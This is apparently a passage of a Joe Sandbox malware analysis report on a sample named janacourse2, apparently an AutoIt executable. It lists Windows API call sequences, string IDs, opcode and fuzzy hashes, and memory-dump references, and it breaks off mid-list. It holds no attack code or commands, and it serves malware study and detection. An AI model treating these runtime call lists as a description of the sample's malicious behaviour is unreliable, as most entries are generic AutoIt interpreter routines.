                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                            • String ID: 0
                                                                                                            • API String ID: 2760611726-4108050209
                                                                                                            • Opcode ID: ec40ef50dcfedb18bb22f091964a04790f381e869a3c59ccb634458a1349124a
                                                                                                            • Instruction ID: 9c4554b7386448957ba313087cdbe2912f7b412b1e4fe6a47d48d1ee0bacc641
                                                                                                            • Opcode Fuzzy Hash: ec40ef50dcfedb18bb22f091964a04790f381e869a3c59ccb634458a1349124a
                                                                                                            • Instruction Fuzzy Hash: B812B070505202EFE726DF18CA85BA97BE2FF45300F1444ADF5D58B292CB37A8A2DB51
                                                                                                            APIs
                                                                                                            • DestroyWindow.USER32(00000000), ref: 0103273E
                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0103286A
                                                                                                            • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 010328A9
                                                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 010328B9
                                                                                                            • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 01032900
                                                                                                            • GetClientRect.USER32(00000000,?), ref: 0103290C
                                                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 01032955
                                                                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 01032964
                                                                                                            • GetStockObject.GDI32(00000011), ref: 01032974
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 01032978
                                                                                                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 01032988
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 01032991
                                                                                                            • DeleteDC.GDI32(00000000), ref: 0103299A
                                                                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 010329C6
                                                                                                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 010329DD
                                                                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 01032A1D
                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 01032A31
                                                                                                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 01032A42
                                                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 01032A77
                                                                                                            • GetStockObject.GDI32(00000011), ref: 01032A82
                                                                                                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 01032A8D
                                                                                                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 01032A97
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                            • API String ID: 2910397461-517079104
                                                                                                            • Opcode ID: 55ff01a913bd90a3b79bd37f92180ac6e379334c834f58ee56fa88d8cee36b74
                                                                                                            • Instruction ID: 48cd11d79c8aaad81508408f0ae8ca074b27f7e5b0ace4eff10c214d1cede332
                                                                                                            • Opcode Fuzzy Hash: 55ff01a913bd90a3b79bd37f92180ac6e379334c834f58ee56fa88d8cee36b74
                                                                                                            • Instruction Fuzzy Hash: 0DB18DB5A00205AFEB24DF68CD89FAE7BA9FF48710F008554FA55E7294D774E900CBA0
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 01024AED
                                                                                                            • GetDriveTypeW.KERNEL32(?,0104CB68,?,\\.\,0104CC08), ref: 01024BCA
                                                                                                            • SetErrorMode.KERNEL32(00000000,0104CB68,?,\\.\,0104CC08), ref: 01024D36
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorMode$DriveType
                                                                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                            • API String ID: 2907320926-4222207086
                                                                                                            • Opcode ID: 10947ac227cf5de100fcc6a1d92924e88c3d3b1a38313c98333f4ee1e1c36af3
                                                                                                            • Instruction ID: bad18a34a07917ca7e481d30c8cc9ce06b12fce817e9f859f33f80d67225d477
                                                                                                            • Opcode Fuzzy Hash: 10947ac227cf5de100fcc6a1d92924e88c3d3b1a38313c98333f4ee1e1c36af3
                                                                                                            • Instruction Fuzzy Hash: 4A61C630A0451ADBDB55EF1DCA819BD7BE1AB04200B24405AF88BEB712DB76ED85CB45
                                                                                                            APIs
                                                                                                            • GetSysColor.USER32(00000012), ref: 01047421
                                                                                                            • SetTextColor.GDI32(?,?), ref: 01047425
                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 0104743B
                                                                                                            • GetSysColor.USER32(0000000F), ref: 01047446
                                                                                                            • CreateSolidBrush.GDI32(?), ref: 0104744B
                                                                                                            • GetSysColor.USER32(00000011), ref: 01047463
                                                                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 01047471
                                                                                                            • SelectObject.GDI32(?,00000000), ref: 01047482
                                                                                                            • SetBkColor.GDI32(?,00000000), ref: 0104748B
                                                                                                            • SelectObject.GDI32(?,?), ref: 01047498
                                                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 010474B7
                                                                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 010474CE
                                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 010474DB
                                                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0104752A
                                                                                                            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 01047554
                                                                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 01047572
                                                                                                            • DrawFocusRect.USER32(?,?), ref: 0104757D
                                                                                                            • GetSysColor.USER32(00000011), ref: 0104758E
                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 01047596
                                                                                                            • DrawTextW.USER32(?,010470F5,000000FF,?,00000000), ref: 010475A8
                                                                                                            • SelectObject.GDI32(?,?), ref: 010475BF
                                                                                                            • DeleteObject.GDI32(?), ref: 010475CA
                                                                                                            • SelectObject.GDI32(?,?), ref: 010475D0
                                                                                                            • DeleteObject.GDI32(?), ref: 010475D5
                                                                                                            • SetTextColor.GDI32(?,?), ref: 010475DB
                                                                                                            • SetBkColor.GDI32(?,?), ref: 010475E5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                            • String ID:
                                                                                                            • API String ID: 1996641542-0
                                                                                                            • Opcode ID: 2a6f7e66720a63dbe6e36ec758f2c0b5031f31501a3575fab7ea8466cf2a6822
                                                                                                            • Instruction ID: 24a0412f4f5c1efd47d5acefa8e077d664d4e5ee7303c5405bffc6ba38c6d3c6
                                                                                                            • Opcode Fuzzy Hash: 2a6f7e66720a63dbe6e36ec758f2c0b5031f31501a3575fab7ea8466cf2a6822
                                                                                                            • Instruction Fuzzy Hash: 3661A1B6901218AFEF119FA4DD88EEE7FB9EB09320F104161FA51BB291D7759940CF90
                                                                                                            APIs
                                                                                                            • GetCursorPos.USER32(?), ref: 01041128
                                                                                                            • GetDesktopWindow.USER32 ref: 0104113D
                                                                                                            • GetWindowRect.USER32(00000000), ref: 01041144
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 01041199
                                                                                                            • DestroyWindow.USER32(?), ref: 010411B9
                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 010411ED
                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0104120B
                                                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0104121D
                                                                                                            • SendMessageW.USER32(00000000,00000421,?,?), ref: 01041232
                                                                                                            • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 01041245
                                                                                                            • IsWindowVisible.USER32(00000000), ref: 010412A1
                                                                                                            • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 010412BC
                                                                                                            • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 010412D0
                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 010412E8
                                                                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 0104130E
                                                                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 01041328
                                                                                                            • CopyRect.USER32(?,?), ref: 0104133F
                                                                                                            • SendMessageW.USER32(00000000,00000412,00000000), ref: 010413AA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                            • String ID: ($0$tooltips_class32
                                                                                                            • API String ID: 698492251-4156429822
                                                                                                            • Opcode ID: 145dbff08522e1cad3f708d7726876ff7b614dc3280b9784a4dd225dce911ee9
                                                                                                            • Instruction ID: 834e1bfb2a6a118db15e5c360d55781cba71caf9f48b24f3767011f7b7b376dc
                                                                                                            • Opcode Fuzzy Hash: 145dbff08522e1cad3f708d7726876ff7b614dc3280b9784a4dd225dce911ee9
                                                                                                            • Instruction Fuzzy Hash: FAB18DB1604341AFE754DF65C984BAABBE4FF88350F008968F9999B261C771E844CF92
                                                                                                            APIs
                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FC8968
                                                                                                            • GetSystemMetrics.USER32(00000007), ref: 00FC8970
                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FC899B
                                                                                                            • GetSystemMetrics.USER32(00000008), ref: 00FC89A3
                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 00FC89C8
                                                                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00FC89E5
                                                                                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00FC89F5
                                                                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00FC8A28
                                                                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00FC8A3C
                                                                                                            • GetClientRect.USER32(00000000,000000FF), ref: 00FC8A5A
                                                                                                            • GetStockObject.GDI32(00000011), ref: 00FC8A76
                                                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00FC8A81
                                                                                                              • Part of subcall function 00FC912D: GetCursorPos.USER32(?), ref: 00FC9141
                                                                                                              • Part of subcall function 00FC912D: ScreenToClient.USER32(00000000,?), ref: 00FC915E
                                                                                                              • Part of subcall function 00FC912D: GetAsyncKeyState.USER32(00000001), ref: 00FC9183
                                                                                                              • Part of subcall function 00FC912D: GetAsyncKeyState.USER32(00000002), ref: 00FC919D
                                                                                                            • SetTimer.USER32(00000000,00000000,00000028,00FC90FC), ref: 00FC8AA8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                            • String ID: AutoIt v3 GUI
                                                                                                            • API String ID: 1458621304-248962490
                                                                                                            • Opcode ID: 5b9439df5c8d8a2f5edacfd4189641c8e1adeb87983da7956e26fd155de5b5a7
                                                                                                            • Instruction ID: 817778a743a0a5ce791869a222fc5affcb1ca780becdfff28d3a8dd1781feb07
                                                                                                            • Opcode Fuzzy Hash: 5b9439df5c8d8a2f5edacfd4189641c8e1adeb87983da7956e26fd155de5b5a7
                                                                                                            • Instruction Fuzzy Hash: 70B19375A0020AEFEB15DF68CA85FAE3BB5FB48310F004219FA95A72C4DB39D941CB50
                                                                                                            APIs
                                                                                                              • Part of subcall function 010110F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 01011114
                                                                                                              • Part of subcall function 010110F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,01010B9B,?,?,?), ref: 01011120
                                                                                                              • Part of subcall function 010110F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,01010B9B,?,?,?), ref: 0101112F
                                                                                                              • Part of subcall function 010110F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,01010B9B,?,?,?), ref: 01011136
                                                                                                              • Part of subcall function 010110F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0101114D
                                                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 01010DF5
                                                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 01010E29
                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 01010E40
                                                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 01010E7A
                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 01010E96
                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 01010EAD
                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000008), ref: 01010EB5
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 01010EBC
                                                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 01010EDD
                                                                                                            • CopySid.ADVAPI32(00000000), ref: 01010EE4
                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 01010F13
                                                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 01010F35
                                                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 01010F47
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01010F6E
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 01010F75
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01010F7E
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 01010F85
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01010F8E
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 01010F95
                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 01010FA1
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 01010FA8
                                                                                                              • Part of subcall function 01011193: GetProcessHeap.KERNEL32(00000008,01010BB1,?,00000000,?,01010BB1,?), ref: 010111A1
                                                                                                              • Part of subcall function 01011193: HeapAlloc.KERNEL32(00000000,?,00000000,?,01010BB1,?), ref: 010111A8
                                                                                                              • Part of subcall function 01011193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,01010BB1,?), ref: 010111B7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 4175595110-0
                                                                                                            • Opcode ID: 3a61fb9ed5fc9545b4d5619290c839e68bb4d41a31fd28cd272c79e823f7c891
                                                                                                            • Instruction ID: 064c7c1203423fb2cc581cdf7d199a012fc6c49d5c8a69653a78f81ae9664576
                                                                                                            • Opcode Fuzzy Hash: 3a61fb9ed5fc9545b4d5619290c839e68bb4d41a31fd28cd272c79e823f7c891
                                                                                                            • Instruction Fuzzy Hash: 52718EB190120AABEB209FA5DD45FEEBBB8BF05300F044159FA99E7188D7399945CB60
                                                                                                            APIs
                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0103C4BD
                                                                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,0104CC08,00000000,?,00000000,?,?), ref: 0103C544
                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0103C5A4
                                                                                                            • _wcslen.LIBCMT ref: 0103C5F4
                                                                                                            • _wcslen.LIBCMT ref: 0103C66F
                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0103C6B2
                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0103C7C1
                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0103C84D
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0103C881
                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0103C88E
                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0103C960
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                            • API String ID: 9721498-966354055
                                                                                                            • Opcode ID: 36f623419a91d0d4daa6381ca84ebcc922d094a65d36c5117c5a8290b01a8849
                                                                                                            • Instruction ID: 1d9f2ba5476e91c3473a98e3a5631da5325cb2826f06f1693db312dd1b0211fb
                                                                                                            • Opcode Fuzzy Hash: 36f623419a91d0d4daa6381ca84ebcc922d094a65d36c5117c5a8290b01a8849
                                                                                                            • Instruction Fuzzy Hash: B8129D352042019FE714DF15C981A6AB7E5FF88314F08889DF88A9B3A2DB35ED41DB91
                                                                                                            APIs
                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 010409C6
                                                                                                            • _wcslen.LIBCMT ref: 01040A01
                                                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 01040A54
                                                                                                            • _wcslen.LIBCMT ref: 01040A8A
                                                                                                            • _wcslen.LIBCMT ref: 01040B06
                                                                                                            • _wcslen.LIBCMT ref: 01040B81
                                                                                                              • Part of subcall function 00FCF9F2: _wcslen.LIBCMT ref: 00FCF9FD
                                                                                                              • Part of subcall function 01012BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 01012BFA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                            • API String ID: 1103490817-4258414348
                                                                                                            • Opcode ID: 1bc875cd8d9bcc4176d3afa9f212057acfdf09164f9c30a79db41f665bf25a38
                                                                                                            • Instruction ID: c2f18390bf77bf6a20c2500dc6508136719aa3580f18d336db57655ef950cc43
                                                                                                            • Opcode Fuzzy Hash: 1bc875cd8d9bcc4176d3afa9f212057acfdf09164f9c30a79db41f665bf25a38
                                                                                                            • Instruction Fuzzy Hash: 0AE1A0752083018FC714EF29C8909AEB7E1BF88354B0489ADF9D6AB366D735ED45CB81
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen$BuffCharUpper
                                                                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                            • API String ID: 1256254125-909552448
                                                                                                            • Opcode ID: ccb0398b03bd8f699c12bd887018aed7a65a93f82bc45fbc57e1262dc5cca5c2
                                                                                                            • Instruction ID: abb7730dcf61cb7faf0b9e49bb08f61defc1c869a0e5702ac75ef0c1488f8a6d
                                                                                                            • Opcode Fuzzy Hash: ccb0398b03bd8f699c12bd887018aed7a65a93f82bc45fbc57e1262dc5cca5c2
                                                                                                            • Instruction Fuzzy Hash: 8E712632A0052A8BEB21DE3CCE515BE33D9AFD0694F15055AF8D2F7286E635CD46D3A0
                                                                                                            APIs
                                                                                                            • _wcslen.LIBCMT ref: 0104835A
                                                                                                            • _wcslen.LIBCMT ref: 0104836E
                                                                                                            • _wcslen.LIBCMT ref: 01048391
                                                                                                            • _wcslen.LIBCMT ref: 010483B4
                                                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 010483F2
                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,0104361A,?), ref: 0104844E
